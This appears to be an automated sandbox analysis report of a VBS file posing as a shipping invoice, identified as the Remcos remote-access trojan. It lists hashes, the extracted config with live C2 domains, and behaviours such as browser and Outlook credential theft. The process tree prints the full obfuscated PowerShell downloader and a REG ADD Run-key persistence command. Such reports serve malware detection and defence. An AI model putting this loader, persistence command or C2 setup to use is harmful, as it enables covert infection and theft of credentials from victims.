Analysis

  • max time kernel
    140s
  • max time network
    134s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    21/08/2024, 07:15

General

  • Target

    Tracking_Invoice_Awb_BL_00340434757340073972.vbs

  • Size

    139KB

  • MD5

    94afb2d35a2fcfc7473b57ff851451df

  • SHA1

    e9287d3640a1c870a14f69e4dbc6bcb9e4a3b027

  • SHA256

    94a386916bc0a33eebe0a466dbfcba90ccb88891e05b0a06d0f91a84432767d1

  • SHA512

    f9d6e8367df303d7ef02b695574cb68c1123349b517724b0f59f59c3410a204dbfd6c0123e1ba963bd80a879de0c109c41d15725de0a912f5d80867c229b56f9

  • SSDEEP

    3072:BjGO63YDSdYB51Gy/ABuIWHwxoH0sHXaHb0bIkNTEx29OjmB8ZJuZ:RGO63WSdYB51Gy/quNHwaHdHqHb0bIkx

Malware Config

Extracted

Family

remcos

Botnet

WEALTHYBLESSED

C2

janbours92harbu03.duckdns.org:3980

janbours92harbu04.duckdns.org:3981

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    true

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-03JSUC

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Tracking_Invoice_Awb_BL_00340434757340073972.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4496
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentCulture) {$Fosser='SUBsTR';$Fdestederne++;}$Fosser+='ing';Function Identitetsudviklingerne($Brombrbusk){$Nuraghe=$Brombrbusk.Length-$Fdestederne;For( $Complementary=2;$Complementary -lt $Nuraghe;$Complementary+=3){$Renlivedes+=$Brombrbusk.$Fosser.'Invoke'( $Complementary, $Fdestederne);}$Renlivedes;}function Spyhole($Bebyrdelser){ . ($Modvirkede) ($Bebyrdelser);}$Apprenticement=Identitetsudviklingerne '.dMIno zSki nlCalCha O/Si5 ,.C.0Sc Ka(O.W.niNenW,d voDewInsFr ,N,eTAk S1 e0F..Do0S,; a b.W,iiPonTe6ca4 ;,i DexUn6,p4Ec;Bo MirFovSe: S1Sv2.t1,r.Ls0Su)Or ,G CeL.cBakK,oT./Ce2Fr0Ve1 U0,u0Ma1Re0ov1B, ,FFoiHarnieVef.loG xke/Ge1An2Ud1 .Ti0 . ';$Sovemediciner=Identitetsudviklingerne 'KoUGrsO.eHjr,a-P,A ,gMee n.pt.u ';$Abildgaardes=Identitetsudviklingerne ' .hLat .tT.pUn: ./ S/Ru1Re0Ma3 ..Fu7,a7 V. a2 4 S6Po. V1S,5.a/AgR e,rfWarOpeT.s.rhVomDae mn .tSts ,. .p Cr emTe>Ekh GtG,ttepBisI.:la/ ,/Ors ,e .r Gv CrPu-PsjS k tPr. ec.ooAcm K/ HRMseMuf MrUnehrsMeh pmRee.in StCas ...lp ur,imAn ';$Repressionens=Identitetsudviklingerne 'Sh>ko ';$Modvirkede=Identitetsudviklingerne 'S.i re cxSa ';$Serviceorganisation='Vaulter';$philip = Identitetsudviklingerne 'TeegacquhP obi De%BaaGrpSkp GdS aOvtSta S% F\ .cP.oTepT,a,rrM.eCunc,tFl.DeG.eu AeA Cl& e&.l .teEncReh ,oAk rtDo ';Spyhole (Identitetsudviklingerne ' .$ FgOzlCyoF b ,aPrl A:K k Kr SoSuoPhnFoiLt=Al(NocHumNodMe Ma/PacPy Ud$Rop.rhC,iAmlG.i Vp C)V. ');Spyhole (Identitetsudviklingerne 'B.$ kg l ,oTubO.aSul r:FeBT.aMac At ,e .rfoiSaoerp .hOpa dgC.e =I,$ .A Kb,eiSplMedStg Sa .a .rBadskeUnsE.. asEbp,al RiFetBl(G.$UpRCheTrpAbrSoeU s.rs ,i Soann oeA,nPss,o)B. 
');Spyhole (Identitetsudviklingerne 'St[ SNUneS.tHu.P SSue ArChvChi IcB eB PF,oCuiB nOrt OM ba BnElaFag eShr ,]Ch:La: oSEfeLacC u Br FiSttDoy RP,arVaoCatSmonec noSalBa Ch=A Pu[.tN,ae.dtYp.SaS .eFocZouTur IiCat SyOsPAlr.yo tBioSucAfoStlKlTUnyDrp SeUn]Ca:Ne:s,TScl,as ,1 2C ');$Abildgaardes=$Bacteriophage[0];$Complementarynterrace= (Identitetsudviklingerne 'Ho$K,g ,lSko bCraasl a:R,R ,a cdgii ,kAuaBol ,iS,t Te,rtDe=AfNV e rw B-VaOBub Hjd,eRecFot D DSbey esInt.aeI.mfe.PaNKaePatSo.UdWPlecob uC.ulUniN e OnDat');$Complementarynterrace+=$krooni[1];Spyhole ($Complementarynterrace);Spyhole (Identitetsudviklingerne 'Sl$ ,R Da udEmiAck Pa .l,eiAntcaeSpt ,.,rHSleE,a dMeePar Hs B[ $AfSQuoRev Be mm CeSpd ,iRacKaiS,n.ee ArDe].u=An$R APupGepKnrImeNenC,tO i ,c SeUnmSve.nn dtHi ');$Blnd115=Identitetsudviklingerne 'Fo$DrRAcaRadRiiA kS,akll,aiP.tBueVitel.UnDS oA wSan,rlProIga Nd nF DiTulTaeSe( P$StABdbMnihyl KdHeg,oa ia rrK.dGre,bsUn,E.$PrTBoaMas t i.eeForI,)Ge ';$Tastier=$krooni[0];Spyhole (Identitetsudviklingerne 'U,$ ,gIml ooTib uaRel.o:ReA,nm To Zwh,tIn= M(DeTR,e sC,t.i-dePS.at.tkahAo St$TrT NaScsElt Gi PeParSa)Cu ');while (!$Amowt) {Spyhole (Identitetsudviklingerne 'Ir$ ,g MlSto Fbpoa,olDr: TF .e DduntDoeSnrRiiDie,hrU.sCa= $ etUnrPeuIneLj ') ;Spyhole $Blnd115;Spyhole (Identitetsudviklingerne 'VaS DtSpaV rHat.e-BlSinlF e ,ePopSa Kv4St ');Spyhole (Identitetsudviklingerne ' ,$ GgWalmioGlb NaEllWh:,jA mtuoBlwHet A=B.(E.TS.e us Ct.e-ChPt aPatNdhEj Po$KrTSeaFlsM,t .i,oeA.rK.)Ex ') ;Spyhole (Identitetsudviklingerne 'La$Hygjal SoTob Tap.lno:PrsDeh,oiD,fBotSelL.eStsDis,n= d$IngOvlMuo Db saFrlUd:V CDeyGutSuoRudAre ynRedT r.eih.t oeFo5 ,7T + +s,%g.$ HB.naSkcSkt.ueFrr ,i .o .pBuhN,a Rg.ve.r.KocOpo luU,nK tB ') ;$Abildgaardes=$Bacteriophage[$shiftless];}$Sygeeksamenens=347050;$paraphemia=25698;Spyhole (Identitetsudviklingerne ' F$ igDel yoLybSya DlRa: aJTooOduDir Tn Da LlNoe,en,rs,r1Pa7 ,9Hu A =Se AfG eOrtTo-NeC,uoAsn itPoeMen.otR, Br$DeTGoaTysPatPoi.aeM.rGe ');Spyhole (Identitetsudviklingerne 
' U$PagStlSpoBrbM.aMalS,:LsP,eoAmlChyB.gBeoNonCe2 C5 U Fi=f. Gr[SpSBlyGrsIntr.eAfmGv.R C.voUnn PvDieGnrExtO,]St:Vo: bF hr.ro EmPoBRaaOvsKleb,6L.4 oS.nttarTrib,nT,gAf(De$P.J,ooTruPrrBenoraPol.ce,nn KsFo1Aa7 ,9ye)N, ');Spyhole (Identitetsudviklingerne ' .$ShgM,lGto ob.ea.ol W:BaHAbezea rrH k GeB,n,niV nregAf Pr=Le o[N.SKay,rsUntS eu m h. TRueL x,utKo.SyEG,nBrcAfo.hd ,iNonUngA,] p:Sk: AAViSNiC.dIQ,IH..TiGCheOpt IS ttn rOvi nF,g y(Wa$ ,PR.o.olA y,eg .oD.n 2Ad5,r)kn ');Spyhole (Identitetsudviklingerne 'T $Pag.ol GoSibD.a TlAl: aU BnDei v ReUnrOvsGriP t va RrJii TaSenUni BsSumUn= T$BrHBoe ea rVokPaeKan i AnD,gLo.b sSluU bMostrt Ar Si.anBagPu(St$EpSOmyQug.eeTleTrkBosTraIlm AeS,nL eK nAfs.r,Tr$cop MaUnr,ta ,pbohsueS mM,i aa e)M ');Spyhole $Universitarianism;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1192
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\coparent.Gue && echo t"
        3⤵
          PID:1780
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentCulture) {$Fosser='SUBsTR';$Fdestederne++;}$Fosser+='ing';Function Identitetsudviklingerne($Brombrbusk){$Nuraghe=$Brombrbusk.Length-$Fdestederne;For( $Complementary=2;$Complementary -lt $Nuraghe;$Complementary+=3){$Renlivedes+=$Brombrbusk.$Fosser.'Invoke'( $Complementary, $Fdestederne);}$Renlivedes;}function Spyhole($Bebyrdelser){ . ($Modvirkede) ($Bebyrdelser);}$Apprenticement=Identitetsudviklingerne '.dMIno zSki nlCalCha O/Si5 ,.C.0Sc Ka(O.W.niNenW,d voDewInsFr ,N,eTAk S1 e0F..Do0S,; a b.W,iiPonTe6ca4 ;,i DexUn6,p4Ec;Bo MirFovSe: S1Sv2.t1,r.Ls0Su)Or ,G CeL.cBakK,oT./Ce2Fr0Ve1 U0,u0Ma1Re0ov1B, ,FFoiHarnieVef.loG xke/Ge1An2Ud1 .Ti0 . ';$Sovemediciner=Identitetsudviklingerne 'KoUGrsO.eHjr,a-P,A ,gMee n.pt.u ';$Abildgaardes=Identitetsudviklingerne ' .hLat .tT.pUn: ./ S/Ru1Re0Ma3 ..Fu7,a7 V. a2 4 S6Po. V1S,5.a/AgR e,rfWarOpeT.s.rhVomDae mn .tSts ,. .p Cr emTe>Ekh GtG,ttepBisI.:la/ ,/Ors ,e .r Gv CrPu-PsjS k tPr. ec.ooAcm K/ HRMseMuf MrUnehrsMeh pmRee.in StCas ...lp ur,imAn ';$Repressionens=Identitetsudviklingerne 'Sh>ko ';$Modvirkede=Identitetsudviklingerne 'S.i re cxSa ';$Serviceorganisation='Vaulter';$philip = Identitetsudviklingerne 'TeegacquhP obi De%BaaGrpSkp GdS aOvtSta S% F\ .cP.oTepT,a,rrM.eCunc,tFl.DeG.eu AeA Cl& e&.l .teEncReh ,oAk rtDo ';Spyhole (Identitetsudviklingerne ' .$ FgOzlCyoF b ,aPrl A:K k Kr SoSuoPhnFoiLt=Al(NocHumNodMe Ma/PacPy Ud$Rop.rhC,iAmlG.i Vp C)V. ');Spyhole (Identitetsudviklingerne 'B.$ kg l ,oTubO.aSul r:FeBT.aMac At ,e .rfoiSaoerp .hOpa dgC.e =I,$ .A Kb,eiSplMedStg Sa .a .rBadskeUnsE.. asEbp,al RiFetBl(G.$UpRCheTrpAbrSoeU s.rs ,i Soann oeA,nPss,o)B. 
');Spyhole (Identitetsudviklingerne 'St[ SNUneS.tHu.P SSue ArChvChi IcB eB PF,oCuiB nOrt OM ba BnElaFag eShr ,]Ch:La: oSEfeLacC u Br FiSttDoy RP,arVaoCatSmonec noSalBa Ch=A Pu[.tN,ae.dtYp.SaS .eFocZouTur IiCat SyOsPAlr.yo tBioSucAfoStlKlTUnyDrp SeUn]Ca:Ne:s,TScl,as ,1 2C ');$Abildgaardes=$Bacteriophage[0];$Complementarynterrace= (Identitetsudviklingerne 'Ho$K,g ,lSko bCraasl a:R,R ,a cdgii ,kAuaBol ,iS,t Te,rtDe=AfNV e rw B-VaOBub Hjd,eRecFot D DSbey esInt.aeI.mfe.PaNKaePatSo.UdWPlecob uC.ulUniN e OnDat');$Complementarynterrace+=$krooni[1];Spyhole ($Complementarynterrace);Spyhole (Identitetsudviklingerne 'Sl$ ,R Da udEmiAck Pa .l,eiAntcaeSpt ,.,rHSleE,a dMeePar Hs B[ $AfSQuoRev Be mm CeSpd ,iRacKaiS,n.ee ArDe].u=An$R APupGepKnrImeNenC,tO i ,c SeUnmSve.nn dtHi ');$Blnd115=Identitetsudviklingerne 'Fo$DrRAcaRadRiiA kS,akll,aiP.tBueVitel.UnDS oA wSan,rlProIga Nd nF DiTulTaeSe( P$StABdbMnihyl KdHeg,oa ia rrK.dGre,bsUn,E.$PrTBoaMas t i.eeForI,)Ge ';$Tastier=$krooni[0];Spyhole (Identitetsudviklingerne 'U,$ ,gIml ooTib uaRel.o:ReA,nm To Zwh,tIn= M(DeTR,e sC,t.i-dePS.at.tkahAo St$TrT NaScsElt Gi PeParSa)Cu ');while (!$Amowt) {Spyhole (Identitetsudviklingerne 'Ir$ ,g MlSto Fbpoa,olDr: TF .e DduntDoeSnrRiiDie,hrU.sCa= $ etUnrPeuIneLj ') ;Spyhole $Blnd115;Spyhole (Identitetsudviklingerne 'VaS DtSpaV rHat.e-BlSinlF e ,ePopSa Kv4St ');Spyhole (Identitetsudviklingerne ' ,$ GgWalmioGlb NaEllWh:,jA mtuoBlwHet A=B.(E.TS.e us Ct.e-ChPt aPatNdhEj Po$KrTSeaFlsM,t .i,oeA.rK.)Ex ') ;Spyhole (Identitetsudviklingerne 'La$Hygjal SoTob Tap.lno:PrsDeh,oiD,fBotSelL.eStsDis,n= d$IngOvlMuo Db saFrlUd:V CDeyGutSuoRudAre ynRedT r.eih.t oeFo5 ,7T + +s,%g.$ HB.naSkcSkt.ueFrr ,i .o .pBuhN,a Rg.ve.r.KocOpo luU,nK tB ') ;$Abildgaardes=$Bacteriophage[$shiftless];}$Sygeeksamenens=347050;$paraphemia=25698;Spyhole (Identitetsudviklingerne ' F$ igDel yoLybSya DlRa: aJTooOduDir Tn Da LlNoe,en,rs,r1Pa7 ,9Hu A =Se AfG eOrtTo-NeC,uoAsn itPoeMen.otR, Br$DeTGoaTysPatPoi.aeM.rGe ');Spyhole (Identitetsudviklingerne 
' U$PagStlSpoBrbM.aMalS,:LsP,eoAmlChyB.gBeoNonCe2 C5 U Fi=f. Gr[SpSBlyGrsIntr.eAfmGv.R C.voUnn PvDieGnrExtO,]St:Vo: bF hr.ro EmPoBRaaOvsKleb,6L.4 oS.nttarTrib,nT,gAf(De$P.J,ooTruPrrBenoraPol.ce,nn KsFo1Aa7 ,9ye)N, ');Spyhole (Identitetsudviklingerne ' .$ShgM,lGto ob.ea.ol W:BaHAbezea rrH k GeB,n,niV nregAf Pr=Le o[N.SKay,rsUntS eu m h. TRueL x,utKo.SyEG,nBrcAfo.hd ,iNonUngA,] p:Sk: AAViSNiC.dIQ,IH..TiGCheOpt IS ttn rOvi nF,g y(Wa$ ,PR.o.olA y,eg .oD.n 2Ad5,r)kn ');Spyhole (Identitetsudviklingerne 'T $Pag.ol GoSibD.a TlAl: aU BnDei v ReUnrOvsGriP t va RrJii TaSenUni BsSumUn= T$BrHBoe ea rVokPaeKan i AnD,gLo.b sSluU bMostrt Ar Si.anBagPu(St$EpSOmyQug.eeTleTrkBosTraIlm AeS,nL eK nAfs.r,Tr$cop MaUnr,ta ,pbohsueS mM,i aa e)M ');Spyhole $Universitarianism;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2840
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\coparent.Gue && echo t"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:3168
          • C:\Program Files (x86)\windows mail\wab.exe
            "C:\Program Files (x86)\windows mail\wab.exe"
            4⤵
            • Suspicious use of NtCreateThreadExHideFromDebugger
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • Drops file in Program Files directory
            • System Location Discovery: System Language Discovery
            • Modifies registry class
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:4892
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "pericline" /t REG_EXPAND_SZ /d "%Dukkestuens% -w 1 $Vibefedt=(Get-ItemProperty -Path 'HKCU:\Phaetons29\').Drawbench;%Dukkestuens% ($Vibefedt)"
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:4312
              • C:\Windows\SysWOW64\reg.exe
                REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "pericline" /t REG_EXPAND_SZ /d "%Dukkestuens% -w 1 $Vibefedt=(Get-ItemProperty -Path 'HKCU:\Phaetons29\').Drawbench;%Dukkestuens% ($Vibefedt)"
                6⤵
                • Adds Run key to start application
                • System Location Discovery: System Language Discovery
                • Modifies registry key
                PID:3808
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\rxvbebkwfofyxr"
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:532
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\brauwuvptwxdixrzj"
              5⤵
              • Accesses Microsoft Outlook accounts
              • System Location Discovery: System Language Discovery
              PID:4384
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\etgmxmgrpepikdnlszuu"
              5⤵
                PID:4748
              • C:\Program Files (x86)\windows mail\wab.exe
                "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\etgmxmgrpepikdnlszuu"
                5⤵
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4640
              • C:\Windows\SysWOW64\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\pelstlkcdwajfoshifx.vbs"
                5⤵
                • System Location Discovery: System Language Discovery
                PID:4272

      Network

      MITRE ATT&CK Enterprise v15

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_f4ci2frd.iag.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Local\Temp\pelstlkcdwajfoshifx.vbs

        Filesize

        346B

        MD5

        66442ccd48f759b031f9b823384e55bc

        SHA1

        b23d081bdc9686e199bcd24aeccd77ccf4550dc6

        SHA256

        8705236d12f3890c431eef683356787b711351e8b302a2cc1fd333ecd8198355

        SHA512

        5fdb17e0e5f520bcaaab6a160655d608f8e5cefe49c6aa221b808d256294ae565e05f3f097c875ed716e8424c4c180418d7216014846d54a44948961169df245

      • C:\Users\Admin\AppData\Local\Temp\rxvbebkwfofyxr

        Filesize

        4KB

        MD5

        1891919175c888ce82e9bd8a047b01ad

        SHA1

        502a6892a5d27ecb791ac5aa6d8586944f540453

        SHA256

        a6c43b4e4b8681cf0ef56c49c730fa77e34dc82db0260253a3ba75039030b9ec

        SHA512

        8bb940050b1abf6c27db133ed446f41e108f670f361ed5102408832ce33d9b87cd0880723441f1632292eeeb0a319c4e0fac0ea659eb55ebe1130cc3e6c776a3

      • C:\Users\Admin\AppData\Roaming\coparent.Gue

        Filesize

        485KB

        MD5

        7758ad90fd9716d4927be506ea5f4681

        SHA1

        b44de990c314093868f0d2b7d705d999ab49ebbe

        SHA256

        3a4fe8b8c4ed2b23264d31acc0a182226506a05ff984b1b70602af49c236c5e1

        SHA512

        558f058622d2d5959fa76818085eaa653545b890732cb347d7f9c7824280066b190fbdc9d8895567ea0a7846a0f4b8f168cc06400c7411d99e7574612210e071

      • memory/532-66-0x0000000000400000-0x0000000000478000-memory.dmp

        Filesize

        480KB

      • memory/532-62-0x0000000000400000-0x0000000000478000-memory.dmp

        Filesize

        480KB

      • memory/532-69-0x0000000000400000-0x0000000000478000-memory.dmp

        Filesize

        480KB

      • memory/1192-18-0x00007FFFE82A3000-0x00007FFFE82A5000-memory.dmp

        Filesize

        8KB

      • memory/1192-16-0x00007FFFE82A0000-0x00007FFFE8D61000-memory.dmp

        Filesize

        10.8MB

      • memory/1192-15-0x00007FFFE82A0000-0x00007FFFE8D61000-memory.dmp

        Filesize

        10.8MB

      • memory/1192-10-0x0000027DEFF90000-0x0000027DEFFB2000-memory.dmp

        Filesize

        136KB

      • memory/1192-4-0x00007FFFE82A3000-0x00007FFFE82A5000-memory.dmp

        Filesize

        8KB

      • memory/1192-35-0x00007FFFE82A0000-0x00007FFFE8D61000-memory.dmp

        Filesize

        10.8MB

      • memory/1192-60-0x00007FFFE82A0000-0x00007FFFE8D61000-memory.dmp

        Filesize

        10.8MB

      • memory/1192-44-0x00007FFFE82A0000-0x00007FFFE8D61000-memory.dmp

        Filesize

        10.8MB

      • memory/2840-24-0x0000000005870000-0x00000000058D6000-memory.dmp

        Filesize

        408KB

      • memory/2840-21-0x00000000051D0000-0x00000000057F8000-memory.dmp

        Filesize

        6.2MB

      • memory/2840-40-0x0000000007240000-0x00000000072D6000-memory.dmp

        Filesize

        600KB

      • memory/2840-41-0x0000000007140000-0x0000000007162000-memory.dmp

        Filesize

        136KB

      • memory/2840-42-0x0000000007F40000-0x00000000084E4000-memory.dmp

        Filesize

        5.6MB

      • memory/2840-38-0x00000000078C0000-0x0000000007F3A000-memory.dmp

        Filesize

        6.5MB

      • memory/2840-37-0x0000000005F60000-0x0000000005FAC000-memory.dmp

        Filesize

        304KB

      • memory/2840-45-0x00000000084F0000-0x000000000C5F5000-memory.dmp

        Filesize

        65.0MB

      • memory/2840-20-0x00000000025E0000-0x0000000002616000-memory.dmp

        Filesize

        216KB

      • memory/2840-36-0x0000000005F20000-0x0000000005F3E000-memory.dmp

        Filesize

        120KB

      • memory/2840-39-0x00000000064B0000-0x00000000064CA000-memory.dmp

        Filesize

        104KB

      • memory/2840-22-0x0000000005050000-0x0000000005072000-memory.dmp

        Filesize

        136KB

      • memory/2840-23-0x0000000005100000-0x0000000005166000-memory.dmp

        Filesize

        408KB

      • memory/2840-34-0x0000000005920000-0x0000000005C74000-memory.dmp

        Filesize

        3.3MB

      • memory/4384-70-0x0000000000400000-0x0000000000462000-memory.dmp

        Filesize

        392KB

      • memory/4384-65-0x0000000000400000-0x0000000000462000-memory.dmp

        Filesize

        392KB

      • memory/4384-63-0x0000000000400000-0x0000000000462000-memory.dmp

        Filesize

        392KB

      • memory/4640-64-0x0000000000400000-0x0000000000424000-memory.dmp

        Filesize

        144KB

      • memory/4640-67-0x0000000000400000-0x0000000000424000-memory.dmp

        Filesize

        144KB

      • memory/4640-68-0x0000000000400000-0x0000000000424000-memory.dmp

        Filesize

        144KB

      • memory/4892-76-0x0000000021F90000-0x0000000021FA9000-memory.dmp

        Filesize

        100KB

      • memory/4892-80-0x0000000021F90000-0x0000000021FA9000-memory.dmp

        Filesize

        100KB

      • memory/4892-79-0x0000000021F90000-0x0000000021FA9000-memory.dmp

        Filesize

        100KB

      • memory/4892-81-0x0000000000C00000-0x0000000001E54000-memory.dmp

        Filesize

        18.3MB

      • memory/4892-84-0x0000000000C00000-0x0000000001E54000-memory.dmp

        Filesize

        18.3MB

      • memory/4892-85-0x0000000000C00000-0x0000000001E54000-memory.dmp

        Filesize

        18.3MB

      • memory/4892-53-0x0000000000C00000-0x0000000001E54000-memory.dmp

        Filesize

        18.3MB

      • memory/4892-90-0x0000000000C00000-0x0000000001E54000-memory.dmp

        Filesize

        18.3MB